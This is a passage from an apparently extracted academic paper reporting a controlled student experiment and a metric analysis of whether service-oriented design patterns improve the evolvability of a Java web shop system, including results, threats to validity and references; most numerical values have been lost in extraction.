durations. it was not possible to identify the student by name via the participant id, which guaranteed the anonymity of the results. please refer to the repository for the full list of questions. after completing this survey, participants finished the experiment slot and were allowed to leave. experiment results for the analysis, the documented task duration measurements per participant were first combined with the exported survey results via the participant id. we then divided the resulting data set into the two groups (version # and version # ) and analyzed it with descriptive statistics. initially, we wanted to ensure that both versions had comparable characteristics and experience, which is the case in most areas (see table ). on average, group # with participants and group # with participants were of roughly the same study program distribution and semester (∼ . ). when comparing programming experience and self-reported skill, group # seems to have been slightly more experienced. more participants of group # , however, attended the introductory presentation (∼ % points more), a factor that was correlated with effectiveness (kendall’s tau: . , p-value: . ). the standard deviation for most attributes was also similar in both groups and fairly low in general (e.g. around or below . for most -point ordinal scale questions). therefore, the set of participants could be considered as sufficiently homogeneous. so all in all, the two groups were similar enough to assume equal conditions for an effectiveness and efficiency comparison with respect to the treatment, that is, the patterns. with / , median effectiveness was identical for both groups. overall, of participants (∼ %) were able to solve task # , a total of of these additionally solved task bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ # (∼ %), and only participants finished all three tasks (∼ %). roughly % were not able to solve any task, namely out of for group # ( . %) and out of for group # ( . %). the self-reported difficulty/complexity per task ( – ) was also fairly similar for both groups. the only notable exception for this was task # which was perceived as . points less difficult by the pattern group # ( . vs . points). when filtering only for the participants who actually finished this task, the difference is nearly identical ( . points), even though the estimated difficulty is lower ( . vs . ). when analyzing participant efficiency, that is, duration for task completion, we observed that the mean duration per completed task for the total of all three tasks was about % lower for the pattern group # ( : : vs : : ). the analysis per individual task revealed that this is caused by task # and # : group # needed on average ∼ % less time for task # and ∼ % for task # respectively. task # , on the other hand, took group # ∼ % more time to complete. table lists the detailed results for this. the efficiency difference can also be conveniently observed in a boxplot that shows the statistical distribution for task duration (in seconds) grouped by system version and task number (see fig. ). the next step was hypothesis testing, that is, analyzing if the differences between the groups are statistically significant so that we can reject the null hypotheses. to prepare table group characteristics and self-reported experience (sd represents the standard deviation; for experience questions based on the -point ordinal scale, represents “not experienced” while represents “very experienced”). group # (no patterns) group # (patterns) participants ( %) ( %) b.sc. business information systems ( %) ( %) b.sc. computer science ( %) ( %) b.sc. software engineering ( %) ( %) other study programs ( . %) ( . %) introduction attendance ( %) ( %) semesters mean . . sd . . years of programming experience mean . . sd . . java experience ( – ) mean . . sd . . web development experience ( – ) mean . . sd . . service-based systems experience ( – ) mean . . sd . . design patterns experience ( – ) mean . . sd . . service-based patterns experience ( – ) mean . . sd . . all experience-related attributes ( – ) mean . . bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the selection of a suitable statistical test, we first used the shapiro–wilk test to check if our samples were non-normally distributed. for all samples, the p-value was substantially smaller than . , so we had to reject the null hypothesis that our data came from a normal distribution. we therefore needed a non-parametric test that could handle non-normal distributions. the mann–whitney u test (also known as wilcoxon–mann–whitney test) fulfills this requirement. it checks the null hypothesis that the probability is equal that a random value from one group is less than or greater than a random value from another group. we used an exact implementation correcting for ties that were likely to happen for the effectiveness test (only four different values: / ; / ; / ; / ). since median effectiveness of both groups is identical ( / ), the resulting p-value for the hypothesis test is much too large ( . ). this means we cannot reject h and therefore have no support for h that more exercises can be completed for pattern version # . for efficiency, we first tested all three tasks at once (h ) where we identified a mean difference of about %. the resulting p-value of . is barely below the . level, but since we need a significance level of . due to multiple hypotheses, this is still too large. we therefore cannot confidently reject our null hypothesis h , that is, we cannot support h that the pattern group # was overall more efficient on a statistically table result measures per group (sd represents the standard deviation; for difficulty questions based on the -point ordinal scale, represents “not difficult” while represents “very difficult”). group # (no patterns) group # (patterns) participants that solved task# ( %) ( %) participants that solved task# ( %) ( %) participants that solved task# ( %) ( %) effectiveness median / / st quartile / / rd quartile / / reported difficulty for task# ( – ) mean . . sd . . reported difficulty for task# ( – ) mean . . sd . . reported difficulty for task# ( – ) mean . . sd . . duration per individual task mean : : ( , s) : : ( , s) sd : : ( , s) : : ( , s) duration for task# mean : : ( , s) : : ( , s) sd : : ( , s) : : ( , s) duration for task# mean : : ( , s) : : ( , s) sd : : ( s) : : ( s) duration for task# mean : : ( , s) : : ( s) sd : : ( s) : : ( s) duration for all three tasks (in total) mean : : ( , s) : : ( , s) sd : : ( s) : : ( , s) bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ significant level. when performing the same test for the three tasks individually, the resulting p-values are . (task# ), . (task# ), and . (task# ) respectively. this means that with our bonferroni-corrected significance level of p � . (desired significance level divided by the number of hypotheses ⇒ a = . / = . ) we could only reject h and identify support for h (task# , patterns: event-driven messaging/ inversion of communications). a post-hoc power analysis for our only successful hypothesis test (i.e. the probability that the test correctly rejected the null hypothesis) revealed that the statistical power is sufficient ( . ). as pointed out, all other four null hypotheses (h , h , h , h ) could not be rejected. metric analysis for a second comparison of the two system versions, we chose and collected measurements for nine different maintainability metrics (see table ) related to structural design properties such as size, complexity, and coupling from the final systems (post-experiment optimal solutions, see figs. and ). some of these metrics are pretty simple (e.g. # of services or lines of code (loc)). since a number of more sophisticated maintainability metrics specifically designed for service orientation have been suggested in scientific literature (bogner, wagner & zimmermann, ), we also chose some of these (e.g. service interface data cohesion (sidc) or absolute dependence of the service (ads)). all metrics (except for # of services) were collected per service and then aggregated to the system level with aggregation functions such as sum, mean, or max. before we # : p ro c e s s a b s tra c tio n # : s e rv ic e f a c a d e # : e v e n t− d riv e n m e s s a g in g # (no patterns) # (patterns) group / version d u ra ti o n i n s e c task number # : process abstraction # : service facade # : event−driven messaging figure boxplot comparison of the duration per version and task. full-size doi: . /peerj-cs. /fig- bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ describe the detailed metric results, we briefly present the selected metrics, explain our rationale for choosing them, and point out how they were collected. metric definitions in the area of size and granularity, we selected four metrics. the premise with these metrics is that a smaller system with appropriate service granularity (not too many services, not too large services) will be easier to understand and maintain. the first one was # of services, which already is a proxy for system size and therefore does not need to be aggregated. so, if we assume unchanged granularity, fewer services are generally easier to grasp and maintain. we manually derived # of services from the final architecture diagrams. in both versions, the webui was counted as a service while in the pattern version # , the kafka broker was not counted as a service, as it does not contain custom code and is an infrastructure component. as a second metric, we selected the prevalent loc metric that we collected for each service via the static analyzer sonarqube (https://www.sonarqube.org). we then created system-level loc aggregates with sum, mean, median, and max. since loc is sometimes seen as controversial (e.g. if several programming languages are involved), we also selected a volume metric specifically designed for service orientation, namely the weighted service interface count (wsic) by hirzalla, cleland-huang & arsanjani ( ). wsic represents the count of publicly available operations in a service interface with possible weights for different types of operations (e.g. synchronous and asynchronous). we used the standard weight of , which is basically the same as # of operations. values for wsic were automatically derived from the existing openapi (https://github.com/oai/ openapispecification) files with a self-developed analysis tool. like loc, wsic was also aggregated with sum, mean, median, and max. to gain further granularity-related insights in addition to the means and medians of our two volume metrics, we also calculated their ratio, that is, loc/wsic. for a given service, this represents the number of locs that are on average necessary to provide a single table list of the nine selected maintainability metrics to analyze both versions. metric name design property source # of services size – lines of code (loc) size – weighted service interface count (wsic) size hirzalla, cleland-huang & arsanjani ( ) loc/wsic granularity – cyclomatic complexity (cc) complexity mccabe ( ) service interface data cohesion (sidc) cohesion perepletchikov ( ) absolute dependence of the service (ads) coupling rud, schmietendorf & dumke ( ) relaxed ads coupling – absolute importance of the service (ais) coupling rud, schmietendorf & dumke ( ) bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.sonarqube.org https://github.com/oai/openapispecification https://github.com/oai/openapispecification http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ operation. larger values for loc/wsic mean a service has large and potentially complex operations. this metric was aggregated with mean, median, and max. as a measure for complexity, we selected cyclomatic complexity (cc) from mccabe ( ) as a traditional source code metric. while some suggestions for service-based complexity metrics like response for operation (perepletchikov et al., ) or message entropy (mateos et al., ) exist, tool support for their collection is not available and they are hard to calculate manually. despite its criticisms (ostberg & wagner, ), we therefore relied on the widely used cc metric that was gathered for each service via sonarqube. we then subsequently aggregated the values with mean, median, and max. lower values for cc suggest that a service is easier to understand and maintain. in the context of cohesion, we chose the sidc metric proposed by perepletchikov ( ). sidc rates the cohesion of a service interface in percent based on the input and response parameter data types of its operations. if a service interface operates on the same or only a small set of data abstractions (e.g., crud operations for a customer entity), the values for sidc will be closer to % and the service will be easier to analyze and change. we used the already mentioned openapi analysis tool to automatically calculate the percentage values for sidc. these values were then aggregated with mean, median, and min (as lower values are worse). the last maintainability-related design property that we wanted to measure was coupling. in the service-oriented space, “loose coupling” is a prevalent theme aiming to reduce the number and strength of service dependencies and therefore preventing or mitigating ripple effects on changes (pautasso & wilde, ). we therefore chose three metrics to analyze the degree of coupling in both versions, where lower values mean less coupling and therefore increased maintainability. all coupling metrics were manually derived from the final architecture diagrams that also include the dependencies between services. moreover, the same aggregations were used for all of them, namely mean, median, and max. first, we selected the ads metric proposed by rud, schmietendorf & dumke ( ). for a given service, ads represents the number of other services that this service depends on, that is, of which it invokes at least one operation. for pattern version # , dependencies to the kafka broker were counted as well. since ads treats every static dependency exactly in the same way, we also collected values for an adjusted variant of ads that respects looser types of coupling. in that sense, relaxed ads works like ads, except that dependencies to a service façade or the kafka broker were counted with . instead of . the rationale for this was that these two patterns are introduced as intermediaries to reduce coupling. as a consequence, dependencies to them should not be weighted in the same way as direct invocations of services. in version # of the system, the values for relaxed ads are therefore exactly the same as for ads. only in the pattern version # , the values for the two variants differ. the third and last coupling metric, also proposed by rud, schmietendorf & dumke ( ), is complementary to ads, namely the metric absolute importance of the service (ais). for a given service, ais represents the number of other services that have a dependency to this service, that is, that invoke at least one of its operations. since the invocation origin is not really important, we did not gather a relaxed ais variant. bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ metric results to compare the two system versions, we only present the aggregated system-level metrics in this paper (see table ). for a detailed comparison of the underlying service-level metrics, please refer to the metric evaluation spreadsheet in our repository (https://github. com/xjreb/researchmodifiability-pattern-experiment/blob/master/_results/metric- analysis.xlsx) that includes the measurements for each service. when comparing the system-level metrics for size, we immediately see that pattern version # is larger. it has two more services (orderprocesssrv and table system-level metric results per version (change in % refers to the change of the metric value from v to v ; a positive percentage means v is better, a negative one means v is better; in cases with a change of at least %, the better version is marked with a colored background). metric aggregate version # (no patterns) version # (patterns) change in % # of services – . loc sum , , . mean . median . max . wsic sum . mean . . . median . max . loc/wsic mean . . . median . . - . max . . . cc mean . . - . median . . - . max . sidc mean . . - . median . . . min . . . ads mean . . - . median . max - . relaxed ads mean . . - . median . - . max . - . ais mean . . - . median . max . bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/xjreb/researchmodifiability-pattern-experiment/blob/master/_results/metric-analysis.xlsx https://github.com/xjreb/researchmodifiability-pattern-experiment/blob/master/_results/metric-analysis.xlsx https://github.com/xjreb/researchmodifiability-pattern-experiment/blob/master/_results/metric-analysis.xlsx http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ productsrvfaçade) and therefore consists of ∼ % more loc and ∼ % more operations. even though the kafka broker is also new in version # , it is not counted as a service. while mean and median for the size metrics are only slightly worse or stay roughly the same in version # , the max value for wsic increases by ∼ % (from nine to operations). this is due to the newly introduced productsrvfaçade that relays calls to the productsrv, categorysrv, and warehousesrv. lastly, the introduction of the orderprocesssrv in version # impacted the loc/wsic ratio. while the median is slightly better for version # (∼ %), both the mean value (∼ %) and the max value (∼ %) are worse. the reason for this is that the orderprocesssrv provides only a single operation while simultaneously consisting of slightly above average loc. for both complexity and cohesion, our chosen metrics do not show much differences between the two versions. cc aggregates are very similar, with the only notable difference being a slightly larger max value (∼ %) for version # . this is caused by adding the messaging functionality to the notificationsrv. aggregates for sidc are even more similar, which suggests that the patterns at hand do not influence service cohesion all that much. the only design property that seems slightly better in pattern version # is coupling. while the mean and median aggregates of ads stay the same in both version, the max value in version # has been reduced by %: the productsrvfaçade shields the services behind it so that the webui has one dependency less (four instead of five). if we treat looser forms of coupling differently, version # improves even further. for relaxed ads, all aggregates are better in the pattern version (mean by ∼ %, median by %, and max by %), because the kafka broker and productsrvfaçade reduce the weight of service dependencies. finally, even though the median and max aggregates for ais are the same in both versions, the mean value is improved by ∼ % in version # . this is caused by the event-driven messaging/inversion of communications patterns. the kafka broker does not actively call services, but services have to publish or subscribe to it. therefore, the sum values for ads and ais would also be different in version # , even though they would be the same in version # . discussion from the experiment results, we could not derive support for the majority of our hypotheses that service-based patterns had a positive impact on participant effectiveness and efficiency. the mean difference in duration was only significant for task # in isolation. we offer three main interpretations to explain these results. one straightforward possibility is that the patterns of task # (process abstraction) and task # (service façade and decomposed capability) were simply not effective enough to enhance the modifiability of the system under test. their theoretical benefit for the chosen evolution scenario did not (or only partially) translate to a practical setting. only event-driven messaging/inversion of communications from task # led to a significant advantage for the system’s evolvability. while this seems plausible at first sight and our chosen patterns may certainly differ in their effectiveness, we believe that our second and third interpretations are more likely. another explanation for the results may be that the effect of familiarization and experience was stronger for the pattern version # . as they progressed through the tasks, bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ participants naturally grew more accustomed to the system and workspace environment. since the pattern version # exhibited a higher base complexity (more services, more inter-service communication, more build scripts to start before task validation), participants of this group were initially slowed down more than the control group. over the course of the experiment, they gradually adjusted to this so that the effectiveness of the chosen patterns for the evolution scenario could unfold (slightly in task# and fully in task# ). this effect could have been weakened by randomizing the order of tasks per participant. unfortunately, this was not possible because tasks depended on each other. we also offer a possible third explanation in conjunction with the familiarization effect. the patterns’ effect on modifiability seems to have been influenced by whether participants had conscious knowledge of and experience with patterns beforehand. when we analyzed existing correlations between effectiveness and self-reported experience-related factors, we observed that both knowledge of general design patterns as well as service-oriented patterns was more strongly correlated with effectiveness in the pattern group # than in group # : about % more for general patterns (kendall’s tau: . vs . ) and about % more for service-oriented ones (r-values: . vs . ). years of programming experience, for example, was similarly correlated with effectiveness in both groups (r-values: . vs . ). so using students instead of experienced professionals who have worked with patterns before seems to have hurt treatment group # more. the potential modifiability-related benefit of a pattern may be lessened or even negated by its complexity and impact on understandability, if the participant is not familiar with the pattern. potential support for this can be found by narrowing down the sample for both groups to only the best participants. when we filter for only the students that solved at least task # and task # (effectiveness � %), the mean efficiency difference increases: instead of ∼ %, participants of pattern group # now needed ∼ % less time per task. overall, the results suggest that the theoretical evolvability-related advantage of service-oriented patterns is difficult to replicate in controlled experiments: familiarity with the system and experience with the selected patterns seem to have an impact on the patterns’ effectiveness. for inexperienced developers unfamiliar with the system, the additional complexity introduced by the patterns seems to reduce or even outweigh the theoretical positive effect on modifiability. implications of such a conclusion could be that appropriate documentation of used service-oriented patterns as well as thorough pattern-focused initial training of new developers become all the more important to ensure a long-term and sustainable effect of patterns on software evolvability. with respect to the metric analysis, we observed that the pattern version # is worse in the area of size and granularity and better for coupling. our chosen complexity and cohesion metrics are not impacted by the patterns. when counting only changes in metric values of at least %, version # is superior for six size and granularity aggregates (# of services, locsum, wsicsum, wsicmax, loc/wsicmean, and loc/wsicmax), while version # is better for five coupling aggregates (adsmax, relaxed adsmean, relaxed adsmedian, relaxed adsmax, and aismean). however, three of these five improvement areas for version # are aggregates of relaxed ads, a metric that we specifically bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ constructed for the loose coupling nature of the used patterns. without relaxed ads, the pattern version would only be significantly better for two coupling aggregates (adsmax and aismean). all in all, the comparison of structural metrics showed no decisive maintainability improvements in the pattern version, which seems to be in line with the experiment results. the increased system size and slightly worsened granularity in version # may support our interpretation that it took longer in this group until the familiarization effect kicked in. more services and operations meant that participants were potentially under higher cognitive load and required more effort to get familiar with the system. lastly, the partially improved coupling measurements in the pattern version could explain why participants in this group required less time for task# and especially task# : these tasks relied on the patterns service façade and event-driven messaging, which are both related to decoupling. threats to validity threats to validity have to be examined in several areas of this empirical study. with respect to construct validity, our operationalized experiment measure (namely the time necessary to implement a feature) seems valid to represent the construct in a practical real-world setting. efficiency is one of the most used measures for software engineering experiments and, in contrast to maintainability metrics, it is not a structural approximation of this quality attribute. effectiveness, that is, the degree to which participants solved all tasks within the given time frame, is a similarly popular measure in software development, even though efficiency is more relevant in a real-world industry setting. most often, it is not the question, if something can be implemented, but how long it will take. lastly, the results of the metric analysis rely on the maintainability prediction quality of the chosen metrics. several of these metrics (e.g. loc or cc) are well-known and have been extensively studied, but especially some of the younger service-oriented metrics have not been evaluated in or accepted by large-scale industry environments. so, while the chosen design properties seem very fitting for a service-oriented context, the metrics selected to represent them may be of differing quality. similarly, only a limited number of metrics was analyzed and there is always the possibility for more or different metrics. internal validity is concerned with how much the treatment was actually responsible for the observed effect and if there were unknown factors that influenced the results. during the experiment discussion, we already mentioned the observed impact of the participants’ pattern knowledge on the effective modifiability of the patterns. a possible solution to this could have been to only accept participants with a base-level of pattern experience or to include a small lecture on service-oriented patterns in the introductory presentation. we also already described the familiarization effect for later tasks, which makes it harder to analyze the effectiveness of each individual pattern. task randomization as a solution to this was not possible because the task order was important in the constructed evolution scenarios. furthermore, participants were forced to use the provided experiment workspace via a virtual machine. while most students should be somewhat familiar with eclipse, their bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ preferred ide, os, or build tool may be different from the provided environment. this could have hindered their development speed. we have to assume that this effect was similar for each group and task. moreover, participants were allowed to ask questions, if they were not related to the actual coding, but to the experiment environment (e.g., ide, build tool, and evaluation ui). a last potential threat in this area is the general coding ability of participants that may tamper with the results: students that are very slow/fast in general work with similar speed regardless of the group. since participants only worked on one version in our experiment, an uneven distribution of very slow/fast students could have affected the groups’ mean efficiency. while our population of has a smaller risk to be influenced by this than for example, participants and our post-experiment survey did not reveal major experience differences between the groups, the self-reported nature of the comparison still leaves some room for issues. possible solutions could have been to conduct a pilot evaluation study with the participants to divide them into two groups of similar skill or to let participants work on tasks from both groups in a rotating manner. both solutions were not used because of time and effort constraints. concerning the metric analysis, we relied on the correctness of the collected measurements. more complex metrics were gathered automatically with tool support while simple metrics were manually derived (e.g. from architecture diagrams) and double-checked across researchers. even though it is not very likely, there still remains the small possibility of incorrect metric values that may have clouded the analysis. external validity refers to the generalizability of the results to the target population and setting. while the usage of students may be a valid proxy for the desired target population in many cases, our experiment was very challenging for bachelor students. only ∼ % solved all three tasks and ∼ % could not solve any task. we also hypothesize that the missing degree of pattern experience influenced the treatment group’s effectiveness and efficiency. therefore, we expect that a replication with experienced software professionals from industry would yield different results. however, such a replication with a sufficient number of participants is extremely difficult to organize. we created both versions of the web shop system as close to the real world as possible. nonetheless, controlled experiment tasks are still inherently of a somewhat artificial nature with the potential for subjective bias. the experiment results are also bound to the used programming language (java) and service-based communication style (restful http). moreover, we designed the tasks with the intuitive feeling that the pattern version # might be faster to change, because the patterns are perfectly suited for the changes at hand. the benefit of a pattern will always heavily depend on the specifics of the evolution scenario that is performed. in conjunction with this, developers are usually decently familiar with the system that they extend. so, in a real world software maintenance scenario, the benefits of modifiability mechanisms and patterns often manifest over a long period of time with increasing developer familiarity with the system. the artificial construction of the two system versions may also have impacted the reliability of the metric-based analysis. after all, we evaluated the internal quality of artifacts that were created by ourselves, which leaves possibilities for researcher bias. bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to mitigate these threats, metric collection was performed by external research assistants (see “acknowledgments”) and the final set of metrics was not known during the system construction period. nonetheless, using several existing industry or open source systems for the metric-based analysis of patterns would have provided more objective results. in the case of our study, however, the goal of the evaluation with metrics was to provide a second perspective on the two experiment system versions. lastly, one must be very careful to generalize from the results of four patterns, a total of student participants, and nine metrics to all patterns and software developers. the controlled experiment presents first empirical insights for the modifiability of selected service-oriented patterns with inexperienced human participants, while the metric study provides additional structural insights that aim to further the understanding of the patterns’ effects. however, many more similar studies should follow to either support or reject the conclusions of this research. lessons learned from the experiment we experienced a number of limitations with our experiment design that hindered our means for analysis and interpretation. to aid future controlled experiments in the area of design patterns’ impact on modifiability and to prevent researchers from repeating the same mistakes, we documented some lessons learned. first, tasks should not depend on each other. this allows to randomize task order per participant to lessen the familiarization effect and analyze the impact of individual patterns. furthermore, you can then set fixed maximum durations per task which ensures participants work on all tasks. this may obviously decrease the overall number of solved tasks though, especially if they are difficult. another suggestion is to conduct a pilot experiment with similar tasks to rate participants. this rating can then be used to randomly draft individuals to ensure similarly skilled groups. as a less time-consuming alternative, a survey with self-reported skill can be used. if a pre-experiment study is not possible, tasks could be designed to allow participants to work on both versions of the system in alternating fashion. an even number of tasks should be chosen in this case. lastly, it is strongly advised to ensure participants’ familiarity with the patterns. otherwise their effect will be reduced. in combination with this, the most realistic software maintenance/evolution scenario requires that participants are already familiar with the system to a certain degree. this could be achieved by using an existing system and its developers. a second version would need to be constructed though. if no fitting existing system is identified and time allows it, a long-term familiarization period with artificial systems could be used before the actual experiment. conclusion to analyze the impact of service-oriented design patterns on software evolvability, we conducted a controlled experiment with bachelor students. participants had to change and extend a service-based web shop system in two functionally equivalent versions over the course of three tasks. we measured effectiveness and efficiency per group. bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ while median effectiveness was the same for both groups ( / ), we saw differences for the mean efficiency, that is, mean duration per task. participants in the treatment group with patterns were about % faster ( : : vs : : ), but due to bonferroni correction not at a statistically significant level (p-value: . ). when analyzing each individual task, we found only the group difference for task # (pattern: event-driven messaging) to be of a significant nature (p-value: . ). here, participants in the treatment group needed about % less time. during the subsequent analysis of the two system versions with nine maintainability metrics, the pattern version # exhibited worse measurements in the area of size and granularity and better measurements for coupling, even though the most improved coupling metric was specifically designed for the patterns’ type of dependency (relaxed ads). complexity as well as cohesion measurements were similar between the two versions. overall, we did not observe decisive maintainability metric improvements in the pattern version, which seems to be in line with the experiment results. our interpretation of these results is that we have no clear indication that three of the four selected service-based patterns were beneficial for evolvability. we theorize, however, that the additional volume introduced by the patterns hindered participants to leverage their modifiability-related benefits at first, which seems to be supported by the size and granularity metrics. over the course of the experiment, participants became more and more familiar with the system and the patterns, which allowed the treatment group to get a slight edge in task # and finally produced full statistical significance in task # . the implications of these results are that documentation and training of used service-based patterns should not be neglected in software maintenance and evolution scenarios. with respect to possible future work, we already mentioned the lack of empirical quantitative research on service-oriented patterns and qas (in our case evolvability). it is therefore necessary that future research provides additional support in this area. many patterns for soa and also some for microservices are available and one study can only cover so many of them. moreover, additional research could also aim to confirm and quantify the impact of developers’ pattern experience on the effectiveness of the patterns. additionally, the metric-based analysis of patterns could be extended to existing industry or open source systems to mitigate the construction bias. as an alternative, several practitioners or external researchers could implement systems with these patterns to allow for a more objective analysis. to support such endeavors and to enable potential replication studies, we shared all artifacts related to the experiment and metric analysis on github (https://github.com/xjreb/researchmodifiability-pattern-experiment) and zenodo (doi . /zenodo. ) (source code, task descriptions, survey questions, result data sets, analysis script). acknowledgements we kindly thank daniel graziotin from the university of stuttgart as well as maximilian jager from the university of mannheim for the fruitful discussions about our paper and specifically about the used statistical methods. furthermore, we thank aretina iazzolino, philipp meyer, and daniel quack (all from the university of stuttgart) bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/xjreb/researchmodifiability-pattern-experiment https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for their diligent support with the metric analysis. lastly, we are very grateful for the constructive and detailed feedback provided by our reviewers. additional information and declarations funding this work was funded by the ministry of science of baden-württemberg, germany, for the doctoral programme “services computing.” the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: ministry of science of baden-württemberg, germany. competing interests justus bogner is not only a phd student, but also a software engineer at dxc technology. stefan wagner and alfred zimmermann have no potential competing interests. author contributions � justus bogner conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � stefan wagner conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. � alfred zimmermann conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: data is available at zenodo: bogner, justus. ( ). data and analysis artifacts for service-based evolvability patterns (experiment and metrics) [data set]. zenodo. http://doi.org/ . /zenodo. . references alexander c, ishikawa s, silverstein m. . a pattern language: towns, buildings, construction. new york: oxford university press. ali m, elish mo. . a comparative literature survey of design patterns impact on software quality. in: international conference on information science and applications (icisa). piscataway: ieee. bogner j, wagner s, zimmermann a. . automatically measuring the maintainability of service- and microservice-based systems. in: proceedings of the th international workshop on software measurement and th international conference on software process and product measurement on—iwsm mensura’ . new york: acm press. bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bogner j, wagner s, zimmermann a. . using architectural modifiability tactics to examine evolution qualities of service- and microservice-based systems. sics software-intensive cyber-physical systems ( – ): – doi . /s - - -z. bogner j, zimmermann a, wagner s. . analyzing the relevance of soa patterns for microservice-based systems. in: proceedings of the th central european workshop on services and their composition (zeus’ ). dresden: ceur-ws.org. buschmann f, meunier r, rohnert h, sommerlad p, stal m. . pattern-oriented software architecture: a system of patterns. chichester: wiley publishing, . daigneau r. . service design patterns: fundamental design solutions for soap/wsdl and restful web services. upper saddle river: addison-wesley. erl t. . service-oriented architecture: concepts, technology, and design. upper saddle river: prentice hall ptr. erl t. . soa design patterns. boston: pearson education. erl t, carlyle b, pautasso c, balasubramanian r. . soa with rest: principles, patterns & constraints for building enterprise solutions with rest. upper saddle river: pearson education. falessi d, juristo n, wohlin c, turhan b, münch j, jedlitschka a, oivo m. . empirical software engineering experts on the use of students and professionals in experiments. empirical software engineering ( ): – doi . /s - - - . fehling c, leymann f, retter r, schupeck w, arbitter p. . cloud computing patterns. vienna: springer. fowler m. . patterns of enterprise application architecture. boston: pearson education. fowler m. . microservices resource guide. available at http://martinfowler.com/microservices. galster m, avgeriou p. . qualitative analysis of the impact of soa patterns on quality attributes. in: th international conference on quality software. piscataway: ieee. gamma e, helm r, johnson r, vlissides j. . design patterns: elements of reusable object-oriented software. boston: addison-wesley, . garzás j, garcía f, piattini m. . do rules and patterns affect design maintainability? journal of computer science and technology ( ): – doi . /s - - - . hegedūs p, bán d, ferenc r, gyimóthy t. . myth or reality? analyzing the effect of design patterns on software maintainability. in: kim t-h, ramos c, kim h-k, kiumi a, mohammed s, Ślęzak d, eds. communications in computer and information science. berlin, heidelberg: springer, – . hirzalla m, cleland-huang j, arsanjani a. . a metrics suite for evaluating flexibility and complexity in service oriented architectures. in: international conference on service-oriented computing workshops - icsocw’ . vol. . berlin, heidelberg: springer, – . hohpe g, woolf b. . enterprise integration patterns: designing, building, and deploying messaging solutions. boston: addison-wesley longman publishing co., inc. host m, regnell b, wohlin c. . using students as subjects—a comparative study of students and professionals in lead-time impact assessment. empirical software engineering ( ): – doi . /a: . international organization for standardization. . iso/iec —systems and software engineering—systems and software quality requirements and evaluation (square)—system and software quality models. system and software quality models. vol. . available at https://www. iso.org/standard/ .html. jedlitschka a, ciolkowski m, pfahl d. . reporting experiments in software engineering. in: guide to advanced empirical software engineering. london: springer, – . bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /s - - - http://martinfowler.com/microservices http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /a: https://www.iso.org/standard/ .html https://www.iso.org/standard/ .html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kassab m, el-boussaidi g, mili h. . a quantitative evaluation of the impact of architectural patterns on quality requirements. in: lee r, ed. software engineering research, management and applications . berlin, heidelberg: springer, – . mateos c, zunino a, misra s, anabalon d, flores a. . managing web service interface complexity via an oo metric-based early approach. clei electronic journal ( ): doi . /cleiej. . . . mccabe tj. . a complexity measure. ieee transactions on software engineering se- ( ): – doi . /tse. . . newman s. . building microservices: designing fine-grained systems. first edition. sebastopol: o’reilly media, . ostberg j-p, wagner s. . on automatically collectable metrics for software maintainability evaluation. in: joint conference of the international workshop on software measurement and the international conference on software process and product measurement. piscataway: ieee, – . palma f, an l, khomh f, moha n, gueheneuc y-g. . investigating the change-proneness of service patterns and antipatterns. in: ieee th international conference on service-oriented computing and applications. piscataway: ieee. papazoglou mp. . service-oriented computing: concepts, characteristics and directions. in: proceedings of the th international conference on properties and applications of dielectric materials (cat. no. ch ), piscataway: ieee computer society, – . pautasso c, wilde e. . why is the web loosely coupled? in: proceedings of the th international conference on world wide web—www’ . new york: acm press. perepletchikov m. . software design metrics for predicting maintainability of service-oriented software. a thesis submitted in fulfilment of the requirements for the degree of doctor of philosophy, college of science, engineering and health, rmit university, melbourne, australia. perepletchikov m, ryan c, frampton k, tari z. . coupling metrics for predicting maintainability in service-oriented designs. in: australian software engineering conference (aswec’ ). piscataway: ieee. riaz m, breaux t, williams l. . how have we evaluated software pattern application? a systematic mapping study of research design practices. information and software technology : – doi . /j.infsof. . . . richardson c. . microservices patterns. shelter island: manning publications. rotem-gal-oz a. . soa patterns. new york: manning. rowe d, leaney j, lowe d. . defining systems architecture evolvability—a taxonomy of change. in: international conference on the engineering of computer-based systems. los alamitos: ieee, – . rud d, schmietendorf a, dumke rr. . product metrics for service-oriented infrastructures. in: 